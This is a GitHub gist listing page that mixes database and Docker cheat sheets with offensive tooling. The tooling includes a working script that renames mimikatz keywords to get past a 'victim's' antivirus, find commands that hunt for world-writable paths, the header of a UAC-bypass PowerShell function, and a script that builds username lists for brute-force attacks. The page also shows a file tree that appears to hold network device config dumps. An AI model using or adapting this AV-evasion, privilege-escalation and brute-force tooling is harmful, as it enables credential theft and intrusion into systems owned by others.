🏠
OSINT

sergii iermolenko bemonolit

@bemonolit
bemonolit / mimikatz_obfuscator.sh
Created January 2, 2023 07:18 — forked from imaibou/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
# Find World Writable Folders
find / -xdev -type d -perm -0002 -ls
# Find World Writable Files
find / -xdev -type f -perm -0002 -ls

MySQL Cheat Sheet

Help with SQL commands to interact with a MySQL database

MySQL Locations

  • Mac /usr/local/mysql/bin
  • Windows /Program Files/MySQL/MySQL version/bin
  • Xampp /xampp/mysql/bin

Add mysql to your PATH

function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@bemonolit
bemonolit / docker_wordpress.md
Created January 21, 2019 07:27 — forked from bradtraversy/docker_wordpress.md
Docker Compose File For Wordpress, MySQL & phpmyadmin

Wordpress & Docker

This file will set up Wordpress, MySQL & PHPMyAdmin with a single command. Add the code below to a file called "docker-compose.yaml" and run the command

$ docker-compose up -d

# To Tear Down
$ docker-compose down --volumes
@bemonolit
bemonolit / postgres-cheatsheet.md
Created October 24, 2018 17:19 — forked from Kartones/postgres-cheatsheet.md
PostgreSQL command line cheatsheet

PSQL

Magic words:

psql -U postgres

Some interesting flags (to see all, use -h or --help depending on your psql version):

  • -E: will describe the underlying queries of the \ commands (cool for learning!)
  • -l: psql will list all databases and then exit (useful if the user you connect with doesn't have a default database, like at AWS RDS)
@bemonolit
bemonolit / randomize-mac-addresses
Created December 6, 2017 11:16 — forked from fawkesley/randomize-mac-addresses.sh
In Ubuntu 16.04, randomize WiFi MAC addresses with a daily rotation - /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses
#!/bin/sh
# /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses
# Configure every saved WiFi connection in NetworkManager with a spoofed MAC
# address, seeded from the UUID of the connection and the date eg:
# 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20'
# This makes your MAC impossible(?) to track across WiFi providers, and
# for one provider to track across days.
@bemonolit
bemonolit / 30-randomize-mac-address.conf
Created December 6, 2017 11:13 — forked from fawkesley/30-randomize-mac-address.conf
MAC address randomization in Ubuntu 17+ (>= 1.4.1): save to /etc/NetworkManager/conf.d/
# /etc/NetworkManager/conf.d/30-randomize-mac-address.conf
# REQUIRES NETWORK MANAGER >= 1.4.1 (Ubuntu Zesty and above)
# Thanks to https://blogs.gnome.org/thaller/2016/08/26/mac-address-spoofing-in-networkmanager-1-4-0/
# This randomizes your MAC address for *new* connections
# Be sure to change your existing (saved) connections in
# /etc/NetworkManager/system-connections/*
.
├── matree
├── swift
│   ├── 00503_0_254.242_2013mar02
│   ├── 00546_0_ensbdasa-09aug2013
│   ├── 00553_0_ensbdpix3-09aug2013
│   ├── 00554_0_ensbdpix4-09aug2013
│   ├── 00555_0_ensbdrtr1-2013aug09
│   ├── 00557_0_ENSBDVPN1-02AUG2013
│   ├── 00558_0_ENSBDVPN2-02AUG2013
@bemonolit
bemonolit / namemash.py
Created January 7, 2017 14:29 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: %s names.txt" % (sys.argv[0]))
        sys.exit(0)
    for line in open(sys.argv[1]):
        name = ''.join([c for c in line if c == " " or c.isalpha()])